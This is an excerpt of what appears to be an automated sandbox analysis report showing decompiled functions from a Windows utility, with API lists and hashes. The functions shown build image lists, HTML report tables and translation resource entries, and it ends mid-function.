                                                                                                                                                0x00409a91
                                                                                                                                                0x00409a9d
                                                                                                                                                0x00409aa2
                                                                                                                                                0x00409aa8
                                                                                                                                                0x00409ac0
                                                                                                                                                0x00409ac0
                                                                                                                                                0x00409ad5
                                                                                                                                                0x00409af4
                                                                                                                                                0x00409b0a
                                                                                                                                                0x00409b17
                                                                                                                                                0x00409b1b
                                                                                                                                                0x00409b23
                                                                                                                                                0x00409b34
                                                                                                                                                0x00409b3e
                                                                                                                                                0x00409b4e
                                                                                                                                                0x00409b5a
                                                                                                                                                0x00409b60
                                                                                                                                                0x00409b89

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00409A07
                                                                                                                                                • memset.MSVCRT ref: 00409A1C
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A2E
                                                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00409A4C
                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409A65
                                                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409A70
                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 00409A89
                                                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409A9D
                                                                                                                                                • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409AA8
                                                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00409AC0
                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409ACC
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00409ADB
                                                                                                                                                • LoadImageW.USER32 ref: 00409AED
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00409AF8
                                                                                                                                                • LoadImageW.USER32 ref: 00409B0A
                                                                                                                                                • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409B1B
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00409B23
                                                                                                                                                • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00409B3E
                                                                                                                                                • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00409B4E
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00409B5A
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00409B60
                                                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00409B7D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 304928396-0
                                                                                                                                                • Opcode ID: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
                                                                                                                                                • Instruction ID: 6a740ff22d918b1f3da30253e66a4340b4722f468affa3cdbe00c11f6054e755
                                                                                                                                                • Opcode Fuzzy Hash: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
                                                                                                                                                • Instruction Fuzzy Hash: 4C419271641304BFE730AFA0DD8AF9B77A8FB48700F000839F795A51D2C7B6A8449B29
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040DC79, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 69%
                                                                                                                                                			E0040DC79(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040DFD6();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040DBA9(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040DFD6();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                                                0x0040dc79
                                                                                                                                                0x0040dc94
                                                                                                                                                0x0040dc9b
                                                                                                                                                0x0040dca9
                                                                                                                                                0x0040dcb0
                                                                                                                                                0x0040dcb5
                                                                                                                                                0x0040dcbc
                                                                                                                                                0x0040dcc3
                                                                                                                                                0x0040dcca
                                                                                                                                                0x0040dcca
                                                                                                                                                0x0040dcd0
                                                                                                                                                0x0040dcd3
                                                                                                                                                0x0040dcd6
                                                                                                                                                0x0040dce2
                                                                                                                                                0x0040dce7
                                                                                                                                                0x0040dcee
                                                                                                                                                0x0040dcf0
                                                                                                                                                0x0040dcf1
                                                                                                                                                0x0040dcfc
                                                                                                                                                0x0040dd01
                                                                                                                                                0x0040dd02
                                                                                                                                                0x0040dd0f
                                                                                                                                                0x0040dd14
                                                                                                                                                0x0040dd14
                                                                                                                                                0x0040dd17
                                                                                                                                                0x0040dd1d
                                                                                                                                                0x0040dd2c
                                                                                                                                                0x0040dd2d
                                                                                                                                                0x0040dd38
                                                                                                                                                0x0040dd3d
                                                                                                                                                0x0040dd3e
                                                                                                                                                0x0040dd4b
                                                                                                                                                0x0040dd50
                                                                                                                                                0x0040dd59
                                                                                                                                                0x0040dd5f
                                                                                                                                                0x0040dd63
                                                                                                                                                0x0040dd6b
                                                                                                                                                0x0040dd71
                                                                                                                                                0x0040dd76
                                                                                                                                                0x0040dd80
                                                                                                                                                0x0040dd88
                                                                                                                                                0x0040dd8e
                                                                                                                                                0x0040dd92
                                                                                                                                                0x0040dd9a
                                                                                                                                                0x0040dda0
                                                                                                                                                0x0040dda6

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                • API String ID: 3143752011-1996832678
                                                                                                                                                • Opcode ID: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
                                                                                                                                                • Instruction ID: c1522ee0e6335da557e9dda04135524704fc8f14ed906b709f088109683ecb65
                                                                                                                                                • Opcode Fuzzy Hash: c4fff774561d85038a746beef6b637ea5cd86bb203755f0cf655f19ed33be2ac
                                                                                                                                                • Instruction Fuzzy Hash: 213184B2D04306AEE720AA959C82A6B73B99F44714F10817FF215B21C2DB7859889A18
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00408C24, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 56%
                                                                                                                                                			E00408C24(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed short* _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t151;
				intOrPtr* _t152;
				signed int _t154;
				signed int _t155;
				void* _t157;
				void* _t159;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t151 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t159 = _t157 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_t128 =  *((intOrPtr*)(__ebx + 0x2e4));
				_v16 =  *((intOrPtr*)(__ebx + 0x2e4));
				if(_t87 != 0xffffffff) {
					_t128 =  &_v964;
					_push(E0040DBA9(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040DFD6();
					_t159 = _t159 + 0x18;
				}
				E00408857(_t124, _t128, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t151;
				if( *((intOrPtr*)(_t124 + 0x34)) > _t151) {
					while(1) {
						_t154 =  *( *((intOrPtr*)(_t124 + 0x38)) + _v8 * 4);
						_v12 = _t154;
						_t155 = _t154 * 0x14;
						if( *((intOrPtr*)(_t155 +  *((intOrPtr*)(_t124 + 0x48)) + 8)) != _t151) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t151;
						_t152 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t152,  &_v32);
						E0040DBA9(_v32,  &_v348);
						E0040DBDA( *((intOrPtr*)( *_t152))(_v12,  *((intOrPtr*)(_t124 + 0x68))),  *(_t124 + 0x6c));
						 *((intOrPtr*)( *_t124 + 0x54))( *(_t124 + 0x6c), _t152, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x70),  *(_t155 + _v16 + 0x10));
						} else {
							_push( *(_t155 + _v16 + 0x10));
							_push(E0040DBA9(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x70));
							L0040DFD6();
							_t159 = _t159 + 0x14;
						}
						_t109 =  *(_t124 + 0x6c);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
							_pop(_t128);
						}
						E0040DC79( &_v32,  *((intOrPtr*)(_t124 + 0x74)),  *(_t124 + 0x6c));
						_push( *((intOrPtr*)(_t124 + 0x74)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x70));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x68)));
						L0040DFD6();
						_t159 = _t159 + 0x28;
						E00408857(_t124, _t128, _a4,  *((intOrPtr*)(_t124 + 0x68)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x34))) {
							goto L14;
						}
						_t151 = 0;
					}
				}
				L14:
				E00408857(_t124, _t128, _a4, L"</table><p>");
				return E00408857(_t124, _t128, _a4, L"\r\n");
			}































                                                                                                                                                0x00408c24
                                                                                                                                                0x00408c2d
                                                                                                                                                0x00408c45
                                                                                                                                                0x00408c4c
                                                                                                                                                0x00408c58
                                                                                                                                                0x00408c5a
                                                                                                                                                0x00408c5c
                                                                                                                                                0x00408c68
                                                                                                                                                0x00408c6f
                                                                                                                                                0x00408c7e
                                                                                                                                                0x00408c85
                                                                                                                                                0x00408c94
                                                                                                                                                0x00408c9b
                                                                                                                                                0x00408ca2
                                                                                                                                                0x00408ca7
                                                                                                                                                0x00408cad
                                                                                                                                                0x00408cb3
                                                                                                                                                0x00408cb6
                                                                                                                                                0x00408cb8
                                                                                                                                                0x00408cc5
                                                                                                                                                0x00408cc6
                                                                                                                                                0x00408cd1
                                                                                                                                                0x00408cd3
                                                                                                                                                0x00408cd4
                                                                                                                                                0x00408cd9
                                                                                                                                                0x00408cd9
                                                                                                                                                0x00408ce6
                                                                                                                                                0x00408cee
                                                                                                                                                0x00408cf1
                                                                                                                                                0x00408cfb
                                                                                                                                                0x00408d01
                                                                                                                                                0x00408d07
                                                                                                                                                0x00408d0a
                                                                                                                                                0x00408d11
                                                                                                                                                0x00408d1f
                                                                                                                                                0x00408d25
                                                                                                                                                0x00408d28
                                                                                                                                                0x00408d2c
                                                                                                                                                0x00408d30
                                                                                                                                                0x00408d38
                                                                                                                                                0x00408d3b
                                                                                                                                                0x00408d46
                                                                                                                                                0x00408d53
                                                                                                                                                0x00408d69
                                                                                                                                                0x00408d79
                                                                                                                                                0x00408d86
                                                                                                                                                0x00408dc0
                                                                                                                                                0x00408d88
                                                                                                                                                0x00408d8b
                                                                                                                                                0x00408d9e
                                                                                                                                                0x00408d9f
                                                                                                                                                0x00408da4
                                                                                                                                                0x00408da9
                                                                                                                                                0x00408dac
                                                                                                                                                0x00408db1
                                                                                                                                                0x00408db1
                                                                                                                                                0x00408dc7
                                                                                                                                                0x00408dca
                                                                                                                                                0x00408dd0
                                                                                                                                                0x00408dde
                                                                                                                                                0x00408de4
                                                                                                                                                0x00408de4
                                                                                                                                                0x00408dee
                                                                                                                                                0x00408df3
                                                                                                                                                0x00408dfc
                                                                                                                                                0x00408e03
                                                                                                                                                0x00408e04
                                                                                                                                                0x00408e0d
                                                                                                                                                0x00408e14
                                                                                                                                                0x00408e15
                                                                                                                                                0x00408e1a
                                                                                                                                                0x00408e1d
                                                                                                                                                0x00408e22
                                                                                                                                                0x00408e2d
                                                                                                                                                0x00408e32
                                                                                                                                                0x00408e3b
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00408cf9
                                                                                                                                                0x00408cf9
                                                                                                                                                0x00408cfb
                                                                                                                                                0x00408e41
                                                                                                                                                0x00408e4b
                                                                                                                                                0x00408e62

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                                                • Opcode ID: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
                                                                                                                                                • Instruction ID: a67fbf1fc49fec725baa5abd822cc1541e9ed8d2f41859f279ded4865cedaa1f
                                                                                                                                                • Opcode Fuzzy Hash: a4891ec3e285b259e5b4c97711cd0463742504ff0ef249823e507da36f033269
                                                                                                                                                • Instruction Fuzzy Hash: E261AC31900208AFDF24AF55CC85EAA7B79FF44310F1045BAF805BA2D2DB75AA45DB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00409190, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 42%
                                                                                                                                                			E00409190(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				_t75 = __ecx;
				E0040E340(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040DBA9(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040DFD6();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040DBA9(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040DFD6();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040DFD6();
				_t80 = _t79 + 0x10;
				E00408857(_a4, _t75, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040DFD6();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040DFD6();
						_t80 = _t81 + 0x1c;
						_t61 = E00408857(_a4, _t75, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                                                0x00409190
                                                                                                                                                0x00409198
                                                                                                                                                0x004091af
                                                                                                                                                0x004091b6
                                                                                                                                                0x004091c4
                                                                                                                                                0x004091cb
                                                                                                                                                0x004091d9
                                                                                                                                                0x004091e0
                                                                                                                                                0x004091e5
                                                                                                                                                0x004091ec
                                                                                                                                                0x004091fd
                                                                                                                                                0x004091fe
                                                                                                                                                0x00409209
                                                                                                                                                0x0040920e
                                                                                                                                                0x0040920f
                                                                                                                                                0x00409214
                                                                                                                                                0x00409214
                                                                                                                                                0x0040921b
                                                                                                                                                0x0040922c
                                                                                                                                                0x0040922d
                                                                                                                                                0x00409238
                                                                                                                                                0x0040923d
                                                                                                                                                0x0040923e
                                                                                                                                                0x0040924f
                                                                                                                                                0x00409254
                                                                                                                                                0x00409254
                                                                                                                                                0x0040925d
                                                                                                                                                0x0040925e
                                                                                                                                                0x00409269
                                                                                                                                                0x0040926e
                                                                                                                                                0x0040926f
                                                                                                                                                0x00409274
                                                                                                                                                0x00409284
                                                                                                                                                0x00409289
                                                                                                                                                0x0040928e
                                                                                                                                                0x00409298
                                                                                                                                                0x0040929b
                                                                                                                                                0x0040929e
                                                                                                                                                0x004092a7
                                                                                                                                                0x004092ae
                                                                                                                                                0x004092b3
                                                                                                                                                0x004092b5
                                                                                                                                                0x004092bb
                                                                                                                                                0x004092d9
                                                                                                                                                0x004092bd
                                                                                                                                                0x004092bd
                                                                                                                                                0x004092be
                                                                                                                                                0x004092c9
                                                                                                                                                0x004092ce
                                                                                                                                                0x004092cf
                                                                                                                                                0x004092d4
                                                                                                                                                0x004092d4
                                                                                                                                                0x004092e6
                                                                                                                                                0x004092e7
                                                                                                                                                0x004092f0
                                                                                                                                                0x004092f7
                                                                                                                                                0x004092f8
                                                                                                                                                0x00409303
                                                                                                                                                0x00409308
                                                                                                                                                0x00409309
                                                                                                                                                0x0040930e
                                                                                                                                                0x0040931e
                                                                                                                                                0x00409323
                                                                                                                                                0x00409326
                                                                                                                                                0x00409326
                                                                                                                                                0x00409326
                                                                                                                                                0x00000000
                                                                                                                                                0x0040932f
                                                                                                                                                0x00409333

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                                                • Opcode ID: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
                                                                                                                                                • Instruction ID: a3c2da3f9a4e1dbf7e2b2d72e589ec7db7b3c133e798fc967c269c0974e8c497
                                                                                                                                                • Opcode Fuzzy Hash: 997443047b2d047c9c6588f338701c064b6c4b4ca7266adb085e15faabd8a24c
                                                                                                                                                • Instruction Fuzzy Hash: DD41527194021A6AEB20EE55CC41FEA737CFF45304F4444BAF909F2192E7789A548FA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 00407297, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 95COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 88%
                                                                                                                                                			E00407297(void* __ecx, void* __eflags, char _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040E340(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00405800( &_v532);
				_pop(_t44);
				E0040674D( &_v5164);
				_t27 = E0040DE36( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x412c38, _a8);
				wcscpy(0x412e48, L"general");
				E00406DE5(_t61, L"TranslatorName", 0x40f454, 0);
				E00406DE5(_t61, L"TranslatorURL", 0x40f454, 0);
				E00406DE5(_t61, L"Version",  &_v1044, 1);
				E00406DE5(_t61, L"RTL", "0", 0);
				_t13 =  &_a4; // 0x40743b
				EnumResourceNamesW( *_t13, 4, E00407047, 0);
				_t14 =  &_a4; // 0x40743b
				EnumResourceNamesW( *_t14, 5, E00407047, 0);
				wcscpy(0x412e48, L"strings");
				_t38 = E00407170(_t44, _t61, _a4);
				 *0x412c38 =  *0x412c38 & 0x00000000;
				return _t38;
			}













                                                                                                                                                0x0040729f
                                                                                                                                                0x004072b6
                                                                                                                                                0x004072bd
                                                                                                                                                0x004072d2
                                                                                                                                                0x004072d9
                                                                                                                                                0x004072e8
                                                                                                                                                0x004072ed
                                                                                                                                                0x004072f4
                                                                                                                                                0x00407306
                                                                                                                                                0x0040730b
                                                                                                                                                0x0040730d
                                                                                                                                                0x0040731d
                                                                                                                                                0x00407323
                                                                                                                                                0x00407323
                                                                                                                                                0x0040732c
                                                                                                                                                0x0040733c
                                                                                                                                                0x0040734d
                                                                                                                                                0x0040735e
                                                                                                                                                0x00407374
                                                                                                                                                0x00407387
                                                                                                                                                0x0040739e
                                                                                                                                                0x004073a1
                                                                                                                                                0x004073a8
                                                                                                                                                0x004073ab
                                                                                                                                                0x004073b3
                                                                                                                                                0x004073bb
                                                                                                                                                0x004073c3
                                                                                                                                                0x004073cf

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004072BD
                                                                                                                                                • memset.MSVCRT ref: 004072D9
                                                                                                                                                  • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
                                                                                                                                                  • Part of subcall function 0040DE36: GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
                                                                                                                                                  • Part of subcall function 0040DE36: ??2@YAPAXI@Z.MSVCRT ref: 0040DE67
                                                                                                                                                  • Part of subcall function 0040DE36: GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
                                                                                                                                                  • Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
                                                                                                                                                  • Part of subcall function 0040DE36: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
                                                                                                                                                  • Part of subcall function 0040DE36: _snwprintf.MSVCRT ref: 0040DEE7
                                                                                                                                                  • Part of subcall function 0040DE36: wcscpy.MSVCRT ref: 0040DF11
                                                                                                                                                • wcscpy.MSVCRT ref: 0040731D
                                                                                                                                                • wcscpy.MSVCRT ref: 0040732C
                                                                                                                                                • wcscpy.MSVCRT ref: 0040733C
                                                                                                                                                • EnumResourceNamesW.KERNEL32(;t@,00000004,00407047,00000000), ref: 004073A1
                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000005,00407047,00000000), ref: 004073AB
                                                                                                                                                • wcscpy.MSVCRT ref: 004073B3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                                                • String ID: ;t@$H.A$RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                • API String ID: 3037099051-2223684028
                                                                                                                                                • Opcode ID: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
                                                                                                                                                • Instruction ID: 5f8ecd76274f380d0de7cb04729dc73bacf1b7add2d1f3ba80cfb94e375ef893
                                                                                                                                                • Opcode Fuzzy Hash: 74f5d95449f09ce166c542c29ae1e94b567f2845415856ce548fabdb3abc4f89
                                                                                                                                                • Instruction Fuzzy Hash: 27217872A4021875C730B7529C46FCF3B6CDF44758F14047BB90CB60D2E6F96A988AAD
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Function 0040B813, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 190windowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                			E0040B813(intOrPtr __ecx, intOrPtr _a4, short _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __esi;
				void* _t60;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t69;
				void* _t75;
				void* _t97;
				signed int _t105;
				void* _t108;
				intOrPtr _t115;
				signed char _t120;
				signed int _t124;
				intOrPtr _t129;
				intOrPtr _t131;
				intOrPtr* _t134;
				signed int _t136;
				void* _t139;

				_t129 = __ecx;
				_t118 = _a4;
				_t139 = _t118 - 0x402;
				_v8 = __ecx;
				if(_t139 > 0) {
					_t60 = _t118 - 0x415;
